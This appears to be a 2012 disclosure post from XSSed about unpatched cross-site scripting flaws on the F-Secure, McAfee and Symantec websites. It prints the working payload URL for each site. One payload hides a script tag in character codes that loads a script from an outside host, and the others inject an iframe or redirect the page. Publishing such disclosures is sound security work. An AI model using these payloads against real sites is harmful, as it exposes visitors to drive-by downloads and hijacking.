F-Secure, McAfee and Symantec websites again XSSed

Friday, 13 January 2012

Once again, the websites of the three famous antivirus vendors are vulnerable to cross-site scripting. The vulnerabilities were reported by "Zeitjak" and "dick" back in mid-April 2011 and appear to be working still. They can be triggered on the latest Firefox but not on the latest Internet Explorer and Google Chrome, due to the built-in XSS protection which is enabled by default.

Malicious people can exploit the vulnerabilities to perform drive-by-download attacks against visitors and faithful customers.

F-Secure.com (http://www.xssed.com/mirror/72776/):

https://kb.f-secure.com/userSetSession.aspx?c=0&cpc=0&cid=0&t="><body+onload="document%2Ewrite(Strin
g.fromCharCode(60,115,99,114,105,112,116,47,115,114,99,61,104,116,116,112,58,47,47,122,46,108,46,116
,111,62,60,47,115,99,114,105,112,116,62))"+  (TEST)

Past XSS vulns and News:
http://www.xssed.com/search?key=f-secure.com

McAfee.com (http://www.xssed.com/mirror/72724/):

http://go.mcafee.com/activation.cfm?firewall_id="
style="background-image:url('http://i.imgur.com/oHp8A.gif')"
onfocus="document.write(String.fromCharCode(60)%2B'iframe src=http://xssed.com height=100%25
width=100%25>'%2BString.fromCharCode(60)%2B'/iframe>'%2BString.fromCharCode(60)%2B'script>alert(/XSS
/)'%2BString.fromCharCode(60)%2B'/script>')" foo="bar  (TEST)

Past XSS vulns and News:
http://www.xssed.com/search?key=mcafee.com

Symantec.com (http://www.xssed.com/mirror/70522/):

https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_US";document.location="http://www.xssed.com";// (TEST)

Past XSS vulns and News:
http://www.xssed.com/search?key=symantec.com

One thing is sure... when such vulns go public, usually all the three vendors do their best to correct them quickly.